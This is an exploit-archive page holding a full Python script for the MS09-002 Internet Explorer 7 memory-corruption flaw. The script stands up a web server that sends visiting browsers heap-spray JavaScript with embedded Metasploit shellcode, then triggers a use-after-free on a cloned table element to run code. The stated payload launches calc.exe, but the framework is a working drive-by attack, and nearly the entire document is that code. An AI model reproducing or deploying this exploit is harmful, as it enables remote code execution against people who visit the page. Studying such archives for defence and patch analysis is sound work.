[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (fast)
# Published : 2009-03-04
# Author : Ahmed Obied
# Previous Title : SupportSoft DNA Editor Module (dnaedit.dll) Code Execution Exploit
# Next Title : EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)
#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# - Based on the code found by str0ke in the wild for MS09-002
# - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
# Usage : python ie_ms09002.py [port]
#
import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
class RequestHandler(BaseHTTPRequestHandler):
def get_payload(self):
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = 'x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x6f'
payload += 'x02xb1x0ex83xebxfcxe2xf4x93xeaxf5x0ex6fx02x3ax4b'
payload += 'x53x89xcdx0bx17x03x5ex85x20x1ax3ax51x4fx03x5ax47'
payload += 'xe4x36x3ax0fx81x33x71x97xc3x86x71x7ax68xc3x7bx03'
payload += 'x6exc0x5axfax54x56x95x0ax1axe7x3ax51x4bx03x5ax68'
payload += 'xe4x0exfax85x30x1exb0xe5xe4x1ex3ax0fx84x8bxedx2a'
payload += 'x6bxc1x80xcex0bx89xf1x3exeaxc2xc9x02xe4x42xbdx85'
payload += 'x1fx1ex1cx85x07x0ax5ax07xe4x82x01x0ex6fx02x3ax66'
payload += 'x53x5dx80xf8x0fx54x38xf6xecxc2xcax5ex07x7cx69xec'
payload += 'x1cx6ax29xf0xe5x0cxe6xf1x88x61xd0x62x0cx2cxd4x76'
payload += 'x0ax02xb1x0e';
return self.convert_to_utf16(payload)
def get_exploit(self):
exploit = '''
function spray_heap()
{
var payload = unescape("<PAYLOAD>");
var ret = 0x0c0c0c0c;
var heap_chunk_size = 0x40000;
var nopsled_size = heap_chunk_size - (payload.length * 2)
var nopsled = unescape("%u0c0c%u0c0c");
while (nopsled.length < nopsled_size)
nopsled += nopsled;
heap_chunks = new Array();
heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size;
for (var i = 0 ; i < heap_chunks_num ; i++)
heap_chunks[i] = nopsled + payload;
}
function trigger_bug()
{
var obj = document.createElement("table");
obj.click;
var obj_cp = obj.cloneNode();
obj.clearAttributes();
obj = null;
CollectGarbage();
var img = document.createElement("img");
img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC");
obj_cp.click;
}
if (navigator.userAgent.indexOf("MSIE 7") != -1) {
spray_heap();
trigger_bug()
} else
window.location = "about:blank"
'''
exploit = exploit.replace('<PAYLOAD>', self.get_payload())
exploit = '<html><body><script>' + exploit + '</script></body></html>'
return exploit
def convert_to_utf16(self, payload):
# From Beta v2.0 by Berend-Jan Wever
# http://www.milw0rm.com/exploits/656
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i+j]) & 0xff) << (j*8)
enc_payload += '%%u%04x' % num
return enc_payload
def log_request(self, *args, **kwargs):
pass
def do_GET(self):
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
print '[-] Sending exploit to %s ...' % self.client_address[0],
self.wfile.write(self.get_exploit())
print 'done'
def main():
if len(sys.argv) != 2:
print 'Usage: %s [port]' % sys.argv[0]
sys.exit(1)
port = None
try:
port = int(sys.argv[1])
if port < 1 or port > 65535:
raise ValueError
except ValueError:
print '[*] ERROR: invalid port number ...'
sys.exit(-1)
try:
serv = HTTPServer(('', port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print '[-] Web server is running at http://%s:%d/' % (ip, port)
except socket.error:
print '[*] ERROR: a socket error has occurred ...'
sys.exit(-1)
try:
serv.serve_forever()
except KeyboardInterrupt:
print '[-] Exiting ...'
if __name__ == '__main__':
main()
# www.Syue.com [2009-03-04]